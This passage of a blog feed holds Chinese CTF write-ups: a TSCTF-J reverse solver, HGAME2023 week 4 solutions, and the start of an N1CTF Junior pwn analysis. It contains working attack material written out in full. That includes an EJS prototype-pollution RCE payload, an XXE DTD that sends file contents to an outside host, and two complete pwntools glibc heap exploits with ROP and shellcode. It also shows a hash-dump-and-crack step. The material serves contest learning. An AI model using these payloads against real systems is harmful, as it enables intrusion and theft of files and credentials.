    if addrsrc==-1 or addrdst==-1:
        return -1
    return [addrsrc,addrdst]

def load_mem_handler(result):
    return f"*({hex(result[1])})={f'*({hex(result[0])})' if result[0]!=7 else 'reg'}"

def pattern_rol(code):
    result=pattern_load_mem(code)
    if result==-1:
        return -1
    if result[0]!=result[1]:
        return -1
    addr=result[0]
    code=code[6:]
    result=pattern_load_mem(code)
    if result==-1:
        return -1
    if result[1]!=addr or result[0]!=1:
        return -1
    return addr

def pattern_rols(code):
    global ip
    i=1
    addr0=pattern_rol(code)
    if addr0==-1:
        return -1
    ip+=12
    while True:
        addr1=pattern_rol(CodeList[ip:])
        if addr1==-1 or addr1!=addr0:
            break
        i+=1
        ip+=12
        addr0=addr1
    return [addr0, i%16]

def rols_handler(result):
    return f'rol(*({hex(result[0])}), {str(result[1])})'


patterns=[[pattern_rols,rols_handler,0],[pattern_get,get_handler,20],[pattern_put,put_handler,20],[pattern_load_imm,load_imm_handler,11],[pattern_jmp,jmp_handler,0],[pattern_load_mem,load_mem_handler,6],[pattern_load_reg,load_reg_handler,3],[pattern_save_reg,save_reg_handler,3],[pattern_not,not_handler,3],[pattern_nor_reg,nor_reg_handler,3]]

def disassemble():
    global ip
    ip=300
    while ip<len(CodeList):
        flag=0
        for pattern in patterns:
            result=pattern[0](CodeList[ip:])
            if result!=-1:
                dis=pattern[1](result)
                #print(pattern)
                if dis!=None:
                    print(f'{hex(ip)}:{dis}')
                ip+=pattern[2]
                flag=1
                break
        if flag==0:
            input(f'unknown instruction at ip={hex(ip)}')
def solve1(pc,l):
    global ip
    ip=pc
    diff=0x78e-0x689
    for i in range(l):
        for pattern in patterns:
            result=pattern[0](CodeList[ip:])
            if result!=-1:
                dis=pattern[1](result)
                if dis!=None:
                    #print(f'{hex(ip)}:{dis}')
                    dis=dis
                break
        print(chr(rol(CodeList[pattern_not(CodeList[ip:])[0]])),end='')
        ip+=diff
def solve2(pc,l):
    global ip
    ip=pc
    diff1=0xf41-0xefc
    diff2=0xf8c-0xf41
    for j in range(l):
        result=pattern_not(CodeList[ip:])
        #print(not_handler(result))
        num1=CodeList[result[0]]
        ip+=diff1
        result=pattern_not(CodeList[ip:])
        #print(not_handler(result))
        num2=CodeList[result[0]]
        ip+=diff2
        for i in range(32,127):
            if (rev(rev(num1)|i)|rev(rev(i)|num1)) == num2:
                print(chr(i),end='')
def solve3(pc,l):
    global ip
    ip=pc
    diff=0x138e-0x1337
    for i in range(l):
        for pattern in patterns:
            result=pattern[0](CodeList[ip:])
            if result!=-1:
                dis=pattern[1](result)
                if dis!=None:
                    #print(f'{hex(ip)}:{dis}')
                    dis=dis
                break
        print(chr(rol_back(CodeList[pattern_not(CodeList[ip:])[0]])),end='')
        ip+=diff

solve1(0x689,9)
solve2(0xefc,2)
solve1(0x10d6,3)
solve3(0x1337,4)
solve2(0x1487,1)
solve3(0x1523,1)
solve1(0x1628,1)
solve2(0x1673,1)
solve1(0x17bd,1)
solve2(0x1808,1)
solve3(0x18a4,1)
solve1(0x19a9,1)
solve3(0x1a00,1)
solve2(0x1a4b,3)
solve1(0x1cb5,1)
solve2(0x1d00,1)
solve3(0x1d9c,1)
solve2(0x1de7,1)
solve3(0x1e83,1)

因为这个程序多半是由脚本生成的,指令单一且规律,因此也可以写个脚本自动识别加密方式解密,不过考虑到flag不长我就直接观察了(

最终得到flag:TSCTF-J{StUp1D_r0BoT_0N1Y_KnOw_n0R}

]]> TSCTF-J 2022 Reverse Robot赛题复现 by 没有头猪 HGAME2023 week4 writeup https://zqy.ink/2023/02/09/HGAME2023_wk4_wp/ 2023-02-09T21:29:00.000Z 2025-11-14T08:20:36.879Z web

Shared Diary

merge函数中显然可以原型链污染,ban掉了__proto__可以constructor.prototype进行污染。找个ejs能用的payload即可

1
2
3
4
5
6
7
{
"constructor":{
"prototype":{
"client": "true",
"escapeFunction":"1;return process.mainModule.require('fs').readFileSync('/flag').toString()//"
}}
}

Tell Me

注意到代码中的

1
libxml_disable_entity_loader(false);

可以XML实体盲注,服务器端

1
2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/html/flag.php">
<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://exp.zqy.ink?file=%file;'>">

payload

1
2
3
4
5
6
<!DOCTYPE ANY [
<!ENTITY % remote SYSTEM "http://your_vps/xxe.dtd">
%remote;
%all;
%send;
]>

其中flag.php存储的位置是通过第一次路径错误PHP提供的warning得到的

reverse

vm

分析得代码第一字节00-07对应的8种指令

op0: mov

op1: push

op2: pop

op3: 算术运算

op4: cmp

op5: jmp

op6: je

op7: jne

0xFF: 停机

写出汇编伪代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
start:
    mov ecx, 0
    add ecx, edx
    mov eax, [ecx]
    mov ebx, eax
    mov ecx, 32h
    add ecx, edx
    mov eax, [ecx]
    add ebx, eax
    mov ecx, 64h
    add ecx, edx
    mov eax, [ecx]
    xor ebx, eax
    mov eax, 8
    mov ecx, ebx
    shl ebx, eax
    and ebx, ff00h
    shr ecx, eax
    add ebx, ecx
    mov eax, ebx
    push eax
    mov eax, 1
    add edx, eax
    mov eax, edx
    mov ebx, 28h
    cmp eax, ebx
    jne start
    mov edx, 0
label:
    pop ebx
    mov ecx, 96h
    add ecx, edx
    mov eax, [ecx]
    cmp eax, ebx
    jne exit
    mov eax, 1
    add edx, eax
    mov eax, edx
    mov ebx, 28h
    cmp eax, ebx
    jne label
exit:
    hlt

分析逻辑得解密代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
#include<stdio.h>
#include<stdint.h>
unsigned char text[] =
{
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x9B, 0x00, 0x00, 0x00, 0xA8, 0x00, 0x00, 0x00, 0x02, 0x00, 
  0x00, 0x00, 0xBC, 0x00, 0x00, 0x00, 0xAC, 0x00, 0x00, 0x00, 
  0x9C, 0x00, 0x00, 0x00, 0xCE, 0x00, 0x00, 0x00, 0xFA, 0x00, 
  0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xB9, 0x00, 0x00, 0x00, 
  0xFF, 0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x00, 0x74, 0x00, 
  0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 
  0x69, 0x00, 0x00, 0x00, 0xE8, 0x00, 0x00, 0x00, 0x03, 0x00, 
  0x00, 0x00, 0xCB, 0x00, 0x00, 0x00, 0xC9, 0x00, 0x00, 0x00, 
  0xFF, 0x00, 0x00, 0x00, 0xFC, 0x00, 0x00, 0x00, 0x80, 0x00, 
  0x00, 0x00, 0xD6, 0x00, 0x00, 0x00, 0x8D, 0x00, 0x00, 0x00, 
  0xD7, 0x00, 0x00, 0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xA7, 0x00, 0x00, 0x00, 0x1D, 0x00, 0x00, 0x00, 
  0x3D, 0x00, 0x00, 0x00, 0x99, 0x00, 0x00, 0x00, 0x88, 0x00, 
  0x00, 0x00, 0x99, 0x00, 0x00, 0x00, 0xBF, 0x00, 0x00, 0x00, 
  0xE8, 0x00, 0x00, 0x00, 0x96, 0x00, 0x00, 0x00, 0x2E, 0x00, 
  0x00, 0x00, 0x5D, 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0xC9, 0x00, 0x00, 0x00, 0xA9, 0x00, 0x00, 0x00, 0xBD, 0x00, 
  0x00, 0x00, 0x8B, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 
  0xC2, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0xF8, 0x00, 
  0x00, 0x00, 0xF5, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 
  0x63, 0x00, 0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0xD5, 0x00, 
  0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x5D, 0x00, 0x00, 0x00, 
  0x16, 0x00, 0x00, 0x00, 0x98, 0x00, 0x00, 0x00, 0x38, 0x00, 
  0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00, 
  0x38, 0x00, 0x00, 0x00, 0xC1, 0x00, 0x00, 0x00, 0x5E, 0x00, 
  0x00, 0x00, 0xED, 0x00, 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 
  0x29, 0x00, 0x00, 0x00, 0x5A, 0x00, 0x00, 0x00, 0x18, 0x00, 
  0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0xA7, 0x00, 0x00, 0x00, 
  0xFD, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x1E, 0x00, 
  0x00, 0x00, 0x78, 0x00, 0x00, 0x00, 0x8B, 0x00, 0x00, 0x00, 
  0x62, 0x00, 0x00, 0x00, 0xDB, 0x00, 0x00, 0x00, 0x0F, 0x00, 
  0x00, 0x00, 0x8F, 0x00, 0x00, 0x00, 0x9C, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x48, 0x00, 0x00, 0x00, 0xF1, 0x00, 0x00, 0x00, 0x40, 
  0x00, 0x00, 0x00, 0x21, 0x00, 0x00, 0x01, 0x35, 0x00, 0x00, 
  0x00, 0x64, 0x00, 0x00, 0x01, 0x78, 0x00, 0x00, 0x00, 0xF9, 
  0x00, 0x00, 0x01, 0x18, 0x00, 0x00, 0x00, 0x52, 0x00, 0x00, 
  0x00, 0x25, 0x00, 0x00, 0x01, 0x5D, 0x00, 0x00, 0x00, 0x47, 
  0x00, 0x00, 0x00, 0xFD, 0x00, 0x00, 0x01, 0x69, 0x00, 0x00, 
  0x00, 0x5C, 0x00, 0x00, 0x01, 0xAF, 0x00, 0x00, 0x00, 0xB2, 
  0x00, 0x00, 0x01, 0xEC, 0x00, 0x00, 0x01, 0x52, 0x00, 0x00, 
  0x01, 0x4F, 0x00, 0x00, 0x01, 0x1A, 0x00, 0x00, 0x00, 0x50, 
  0x00, 0x00, 0x01, 0x85, 0x00, 0x00, 0x00, 0xCD, 0x00, 0x00, 
  0x00, 0x23, 0x00, 0x00, 0x00, 0xF8, 0x00, 0x00, 0x00, 0x0C, 
  0x00, 0x00, 0x00, 0xCF, 0x00, 0x00, 0x01, 0x3D, 0x00, 0x00, 
  0x01, 0x45, 0x00, 0x00, 0x00, 0x82, 0x00, 0x00, 0x01, 0xD2, 
  0x00, 0x00, 0x01, 0x29, 0x00, 0x00, 0x01, 0xD5, 0x00, 0x00, 
  0x01, 0x06, 0x00, 0x00, 0x01, 0xA2, 0x00, 0x00, 0x00, 0xDE, 
  0x00, 0x00, 0x01, 0xA6, 0x00, 0x00, 0x01, 0xCA, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
int main(){
    uint32_t* data = (uint32_t*) text;
    uint32_t enc[0x28];
    for(int i=0x96+0x28-1,j=0;i>=0x96;i--,j++){
        enc[j]=data[i];
        enc[j]=(enc[j]<<8)|(enc[j]>>8);
    }
    for(int i=0x64,j=0;i<0x64+0x28;i++,j++){
        enc[j]^=data[i];
    }
    for(int i=0x32,j=0;i<0x32+0x28;i++,j++){
        enc[j]-=data[i];
    }
    for(int i=0;i<0x28;i++){
        printf("%c",enc[i]);
    }  

}

shellcode

程序执行一段以base64编码的shellcode,dump出shellcode发现是个tea加密,正常解密即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdio.h>
#define uint32_t unsigned int 
void decrypt (uint32_t* v, uint32_t* k) {
        uint32_t v0=v[0], v1=v[1],  i; /* set up */
        uint32_t delta=0xabcdef23,sum=delta*0x20; /* a key schedule constant */
        uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
        for (i=0; i<0x20; i++) { /* basic cycle start */
                v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
                v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
                sum -= delta;
        } /* end cycle */
        v[0]=v0; v[1]=v1;
}

int main()
{
        unsigned char a[] = { 0x20,0x69,0xb3,0xe4,0xd0,0x24,0x69,0x93,0x44,0xd1,0x16,0xa8,0xf5,0xd5,0x82,0xaa,0xda,0xf0,0x79,0x36,0x6,0xfd,0x32,0x7f,0xd3,0xc0,0x60,0x34,0x39,0x49,0x21,0xb7,0xa2,0x69,0x72,0xe5,0xfa,0x51,0x6a,0x83};
        uint32_t k[4]={22,33,44,55};
        for(int i=0;i<40;i+=8){
                uint32_t v[2]={*(uint32_t*)&a[i], *(uint32_t*)&a[i+4]};
                decrypt(v,k);
                unsigned char* chars = (unsigned char*)v;
                for(int i=0;i<8;i++){
                        printf("%c",chars[i]);
                }

        }
        return 0;
}


pwn

without_hook

glibc 2.36,直接套week3的exp了所以做麻烦了。large bin attack覆写mp_.tcache_bins实现任意地址写后FSOP,链子是House of Cat。(事后看来直接large bin attack打_IO_list_all应该就行了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
from pwn import *
context(arch='amd64',os='linux')
#p=process('./vuln')
p=connect('week-4.hgame.lwsec.cn',30070)
elf=ELF('./vuln')
libc=ELF('./libc.so.6')

def add(idx, size, content=b''):
p.sendlineafter(b'>',b'1')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendlineafter(b'Size: ',str(size).encode())
if content!=b'':
edit(idx,content)

def edit(idx, content=b''):
p.sendlineafter(b'>',b'3')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendafter(b'Content: ',content if content!=b'' else b'a')

def delete(idx):
p.sendlineafter(b'>',b'2')
p.sendlineafter(b'Index: ',str(idx).encode())

def show(idx):
p.sendlineafter(b'>',b'4')
p.sendlineafter(b'Index: ',str(idx).encode())



add(0,0x800)
add(15,0x900)
add(1,0x7f0)
delete(0)
show(0)
libc_base=u64(p.recv(6)+b'\x00\x00')-2059456

add(2,0x820)
show(0)
fd=u64(p.recv(6)+b'\x00\x00')
info('fd:'+hex(fd))
edit(0,b'a'*16)
show(0)
p.recvuntil(b'a'*16)
heap5=u64(p.recv(6)+b'\x00\x00')+12992
heap4=heap5-2320
heap3=heap5-4448
heap_base=heap5-0x3550
edit(0,p64(fd)*2)
info('libc_base:'+hex(libc_base))
libc.address=libc_base
tcache_bins=libc_base+0x1f63a8
_IO_list_all=libc_base+0x1f7660

edit(0, p64(0)*3+p64(tcache_bins-0x20))
delete(1)

add(3,0x840,b'/bin/sh\x00')
add(4,0x900)
add(5,0x900)
add(15,0x900)
delete(4)
delete(5)
edit(5,p64((heap5>>12)^_IO_list_all))

add(6,0x900)
add(7,0x900,p64(heap5))

pop_rdi=libc_base+0x23ba5
pop_rsi=libc_base+0x251fe
pop_rdx_rbx=libc_base+0x8bbb9
pop_r12_r13_r14_r15=libc_base+0x23b9e
roppayload=p64(pop_rdi)+p64(heap_base)+p64(pop_rsi)+p64(0x8000)+p64(pop_rdx_rbx)+p64(7)+p64(0)+p64(libc.sym['mprotect'])+p64(heap3+0x200)
orw=b'\xb8flagPH\x89\xe71\xf61\xc0\x04\x02\x0f\x05\x89\xc7H\x89\xe6f\xb8\x01\x011\xd2f\x89\xc2f\x01\xc61\xc0\x0f\x051\xfff\xff\xc7f\xff\xc71\xc0\xfe\xc0\x0f\x05'
payload=flat({
0xa0:heap3+0x138,
0xa8:p64(pop_rdi),
0x130:roppayload,
0x200:orw
})

call_addr=libc_base+0x41b1d
fake_io_addr=heap5 # 伪造的fake_IO结构体的地址
next_chain = 0
fake_IO_FILE=p64(heap5)         #_flags=rdi
fake_IO_FILE+=p64(0)*7
fake_IO_FILE +=p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE +=p64(heap3)#_IO_backup_base=rdx
fake_IO_FILE +=p64(call_addr)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x68, b'\x00')
fake_IO_FILE += p64(0)  # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, b'\x00')
fake_IO_FILE += p64(heap_base+0x1000)  # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xa0, b'\x00')
fake_IO_FILE +=p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, b'\x00')
fake_IO_FILE += p64(1) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xd8, b'\x00')
fake_IO_FILE += p64(libc_base+0x1f30a0+0x30)  # vtable=IO_wfile_jumps+0x10
fake_IO_FILE +=p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40)  # rax2_addr


edit(5,fake_IO_FILE)
edit(3,payload)
delete(3)
p.interactive()

4nswer’s gift

在malloc比较大的空间时,内存空间是mmap得到的,跟libc的偏移是固定可计算的。gift是把分配到的内存地址覆盖_IO_list_all。House of Cat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
from pwn import *
context(arch='amd64',os='linux')
#p=process('./vuln')
p=connect('week-4.hgame.lwsec.cn',31604)
elf=ELF('./vuln')
libc=ELF('./libc.so.6')

p.recvuntil(b'like this: ')
_IO_list_all=int(p.recv(14),16)
libc_base=_IO_list_all-2061920
info(hex(libc_base))
libc.address=libc_base
p.sendlineafter(b'gift?\n',b'1048576')
heap_base=libc_base-1064960
heap5=heap_base+0x10
heap3=heap_base+0x200

pop_rdi=libc_base+0x23ba5
pop_rsi=libc_base+0x251fe
pop_rdx_rbx=libc_base+0x8bbb9
pop_r12_r13_r14_r15=libc_base+0x23b9e
roppayload=p64(pop_rdi)+p64(heap_base)+p64(pop_rsi)+p64(0x8000)+p64(pop_rdx_rbx)+p64(7)+p64(0)+p64(libc.sym['mprotect'])+p64(heap3+0x200)
orw=b'\xb8flagPH\x89\xe71\xf61\xc0\x04\x02\x0f\x05\x89\xc7H\x89\xe6f\xb8\x01\x011\xd2f\x89\xc2f\x01\xc61\xc0\x0f\x051\xfff\xff\xc7f\xff\xc71\xc0\xfe\xc0\x0f\x05'
payload=flat({
0xa0:heap3+0x138,
0xa8:p64(pop_rdi),
0x130:roppayload,
0x200:orw
})

call_addr=libc_base+0x41b1d
fake_io_addr=heap5 # 伪造的fake_IO结构体的地址
next_chain = 0
fake_IO_FILE=p64(heap5)         #_flags=rdi
fake_IO_FILE+=p64(0)*7
fake_IO_FILE +=p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE +=p64(heap3)#_IO_backup_base=rdx
fake_IO_FILE +=p64(call_addr)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x68, b'\x00')
fake_IO_FILE += p64(0)  # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, b'\x00')
fake_IO_FILE += p64(heap_base+0x1000)  # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xa0, b'\x00')
fake_IO_FILE +=p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, b'\x00')
fake_IO_FILE += p64(1) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xd8, b'\x00')
fake_IO_FILE += p64(libc_base+0x1f30a0+0x30)  # vtable=IO_wfile_jumps+0x10
fake_IO_FILE +=p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40)  # rax2_addr
#fake_IO_FILE.rjust(0x200,b'\x00')

buf=flat({
0:fake_IO_FILE,
0x1f0:payload
})

p.sendafter(b'gitf?\n',buf)
p.interactive()

crypto

LLLCG

题目数据有问题,直接long_to_bytes(list[1]//list[0])

misc

ezWin

1
2
3
4
5
python vol.py -f ..\..\HGAME2023\week4\misc\ezWin\win10_22h2_19045.2486.vmem windows.envars.Envars | findstr "hgame"

python vol.py -f ..\..\HGAME2023\week4\misc\ezWin\win10_22h2_19045.2486.vmem windows.hashdump

python vol.py -f ..\..\HGAME2023\week4\misc\ezWin\win10_22h2_19045.2486.vmem windows.pslist

得到7zFM.exe的pid 7584

1
python vol.py -o ./dump -f ..\..\HGAME2023\week4\misc\ezWin\win10_22h2_19045.2486.vmem windows.dumpfiles --pid=7584

得到file.0xd00641b5ba70.0xd00641180e30.DataSectionObject.flag.7z.dat

按7z格式打开,密码把刚才得到的nthash扔进https://www.cmd5.com/ 就是了

blockchain

需要计算最后部署的chall合约地址。deployer部署Transfer2合约是create,Transfer2合约部署chall合约是create2,算一下就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
contract Hacker{
    function addressFromCreate(address _origin, uint _nonce) public pure returns (address) {
        bytes memory data;
        if (_nonce == 0x00)          data = abi.encodePacked(bytes1(0xd6), bytes1(0x94), _origin, bytes1(0x80));
        else if (_nonce <= 0x7f)     data = abi.encodePacked(bytes1(0xd6), bytes1(0x94), _origin, uint8(_nonce));
        else if (_nonce <= 0xff)     data = abi.encodePacked(bytes1(0xd7), bytes1(0x94), _origin, bytes1(0x81), uint8(_nonce));
        else if (_nonce <= 0xffff)   data = abi.encodePacked(bytes1(0xd8), bytes1(0x94), _origin, bytes1(0x82), uint16(_nonce));
        else if (_nonce <= 0xffffff) data = abi.encodePacked(bytes1(0xd9), bytes1(0x94), _origin, bytes1(0x83), uint24(_nonce));
        else                         data = abi.encodePacked(bytes1(0xda), bytes1(0x94), _origin, bytes1(0x84), uint32(_nonce));
        return address(uint160(uint256(keccak256(data))));
    }
    function addressFromCreate2(address _origin, bytes32 _salt, bytes memory _code) public pure returns (address) {
        return address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xff), address(_origin), _salt, keccak256(_code))))));
    }
    function hack(address deployer) public{
        address contractAddr=addressFromCreate(deployer, 0);
        bytes memory code = "`\x80`@R4\x80\x15`\x0fW`\x00\x80\xfd[Pg\x06\xf0[Y\xd3\xb2\x00\x00G\x10`,W`\x00\x80T`\xff\x19\x16`\x01\x17\x90U[`\x83\x80a\x00:`\x009`\x00\xf3\xfe`\x80`@R4\x80\x15`\x0fW`\x00\x80\xfd[P`\x046\x10`(W`\x005`\xe0\x1c\x80c\x89\x0e\xbah\x14`-W[`\x00\x80\xfd[`\x00T`9\x90`\xff\x16\x81V[`@Q\x90\x15\x15\x81R` \x01`@Q\x80\x91\x03\x90\xf3\xfe\xa2dipfsX\"\x12 \xc0\xaf\xce:x\xfc\xc6\x0f\xe5\xcb\x04-\xb9\xc8\xca\xe1\x0edk?\xcd/\x90_\xa1%\x14^\xeb\xdf\x04\x98dsolcC\x00\x08\x11\x003";
        address challAddr=addressFromCreate2(contractAddr, keccak256("HGAME 2023"), code);
        selfdestruct(payable(challAddr));
    }
    constructor() payable{}
}
]]> HGAME2023 week4 writeup by 没有头猪 N1CTF Junior 2023 Pwn Machine赛题复现 https://zqy.ink/2023/02/09/n1ctf_junior_machine/ 2023-02-09T20:43:50.000Z 2025-11-14T08:20:36.879Z 前言

Machine(似乎)是赛中零解题,赛中我光顾着别的题几乎没看,赛后再看发现其实蛮简单的,就是写起exp来有点麻烦(可能是我经验不足的问题((

题目环境

GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.

1
2
3
4
5
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0a 0xc000003e  if (A != ARCH_X86_64) goto 0012
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x08 0x00 0x40000000  if (A >= 0x40000000) goto 0012
 0004: 0x15 0x07 0x00 0x0000009d  if (A == prctl) goto 0012
 0005: 0x15 0x06 0x00 0x00000038  if (A == clone) goto 0012
 0006: 0x15 0x05 0x00 0x00000039  if (A == fork) goto 0012
 0007: 0x15 0x04 0x00 0x0000003a  if (A == vfork) goto 0012
 0008: 0x15 0x03 0x00 0x0000003b  if (A == execve) goto 0012
 0009: 0x15 0x02 0x00 0x00000065  if (A == ptrace) goto 0012
 0010: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0012
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0012: 0x06 0x00 0x00 0x00000000  return KILL

题目分析

程序实现了一个比较容易分析的虚拟机,指令包括寄存器间的算术运算、内存读写、向寄存器中写立即数、堆块的申请与释放、堆块前16字节的读取。程序在堆上申请空间存储虚拟机内存和我们输入的code。内存大小可选0-0x10000,代码大小可选0-0x1000。虚拟机运行结束后程序显式调用exit(0)。

程序对指令的index做了较为严格的检查,并且不存在UAF漏洞。申请得到的堆块会全部memset为0。考虑到做的这些检查,和不存在堆块写指令,推断应该是哪里(很有可能是写指令)的检查没有做到位,或出现type confusion等问题。最终找到漏洞点:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void __fastcall vmrun(){
    /* ... */
    while (pc<(unsigned int)codeSize){
        opcode=pc++;
        switch(code[opcode]){
                /* ... */
                case '[':
                v41 = *(_WORD *)&code[pc];
                pc += 2;
                    v26 = pc++;
                    if ( (unsigned __int16)(8 * v41) >= (unsigned int)memSize || code[v26] > 3u )
                      printerr("Index Error!");
                    mem[v41] = regs[code[v26]];
                    break;
                /* ... */
        }
    }
}

